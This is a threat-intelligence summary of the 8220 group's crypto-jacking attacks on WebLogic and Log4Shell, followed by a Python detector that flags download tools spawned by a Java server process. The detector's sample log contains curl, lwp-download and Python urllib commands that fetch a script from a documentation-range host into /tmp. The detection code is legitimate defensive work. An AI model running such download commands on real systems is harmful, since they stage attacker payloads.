Key Points:
- The 8220 hacker group, originally identified by Cisco Talos in 2017, is exploiting Windows and Linux web servers using crypto-jacking malware.
- Recently, the group targeted the Oracle WebLogic vulnerability (CVE-2017-3506) and Log4Shell (CVE-2021-44228), continuing their history of exploiting vulnerabilities such as Confluence, Log4j, Drupal, Hadoop YARN, and Apache Struts2 applications.
- The group was also found to be taking advantage of a remote code execution vulnerability in Oracle WebLogic Server, CVE-2020-14883, and an authentication bypass vulnerability, CVE-2020-14882. Exploit code for both is publicly available and relatively easy to adapt for malicious purposes.
The 8220 hacker group uses two separate exploit chains. The first relies on an XML file to execute further commands on the operating system, with a different XML file used depending on the target operating system; on Linux, the group then downloads additional files using cURL, wget, lwp-download, and Python's urllib. The second chain executes Java code directly, without an XML file.
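As an added example (not code from the original report or from Imperva), the following Python detector walks a handful of constructed process-creation log lines and flags the download helpers named above (cURL, wget, lwp-download, Python urllib) when they are spawned by a Java parent process such as a WebLogic server. The log format, host name, paths and URLs are assumptions made for the example.

```python
"""Flag WebLogic-style Java processes spawning download helpers (constructed logs)."""
import os
import re
import shlex
from typing import Dict, List

# Download tools the summary names for the Linux chain; python/urllib is handled separately.
DOWNLOADERS = {"curl", "wget", "lwp-download"}

# Assumed line format: "<ts> host=<h> ppid_image=<parent path> pid=<n> cmd=<command line>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) ppid_image=(?P<parent>\S+) pid=(?P<pid>\d+) cmd=(?P<cmd>.*)$"
)

# Constructed sample telemetry (not real data); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """\
2023-05-01T10:00:01Z host=web01 ppid_image=/opt/oracle/jdk/bin/java pid=4021 cmd=curl -fsSL http://203.0.113.5/x.sh -o /tmp/x.sh
2023-05-01T10:00:02Z host=web01 ppid_image=/opt/oracle/jdk/bin/java pid=4022 cmd=/usr/bin/python -c "import urllib;urllib.urlretrieve('http://203.0.113.5/x.sh','/tmp/x.sh')"
2023-05-01T10:00:03Z host=web01 ppid_image=/bin/bash pid=4030 cmd=wget https://example.org/pkg.tar.gz
2023-05-01T10:00:04Z host=web01 ppid_image=/opt/oracle/jdk/bin/java pid=4031 cmd=/usr/bin/lwp-download http://203.0.113.5/y /tmp/y
2023-05-01T10:00:05Z host=web01 ppid_image=/opt/oracle/jdk/bin/java pid=4032 cmd=/usr/bin/python -c "print('hello')"
"""


def parse_line(line: str) -> Dict[str, str]:
    """Split one log line into its fields; raise on anything that does not match the format."""
    match = LINE_RE.match(line)
    if not match:
        raise ValueError(f"unparseable line: {line!r}")
    return match.groupdict()


def is_download_helper(cmd: str) -> bool:
    """True if the command line is one of the named downloaders or a Python invocation using urllib."""
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to a plain split rather than dropping the event
        argv = cmd.split()
    if not argv:
        return False
    exe = os.path.basename(argv[0])
    if exe in DOWNLOADERS:
        return True
    return exe.startswith("python") and any("urllib" in arg for arg in argv[1:])


def find_suspicious(log: str) -> List[Dict[str, str]]:
    """Return events where a Java parent (assumed to be the WebLogic JVM) spawned a download helper."""
    hits = []
    for line in log.splitlines():
        if not line.strip():
            continue
        event = parse_line(line)
        if os.path.basename(event["parent"]) == "java" and is_download_helper(event["cmd"]):
            hits.append(event)
    return hits
```

In a real deployment the parent check should be tied to the actual WebLogic JVM (by path or process ancestry) rather than any binary named `java`, and the hits should be correlated with the web server's access log for the exploit request that preceded them.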
Once the downloaded payloads are executed, compromised hosts are infected with the AgentTesla, rhajk, and nasqa malware variants. Imperva has published a detailed report offering further insight into the exploitation methods, the commands used, and the encoding employed, among other details.
The increasing sophistication and reach of hacker groups like 8220 underscore the necessity for robust cyber security measures, especially for Windows and Linux web servers which appear to be prime targets.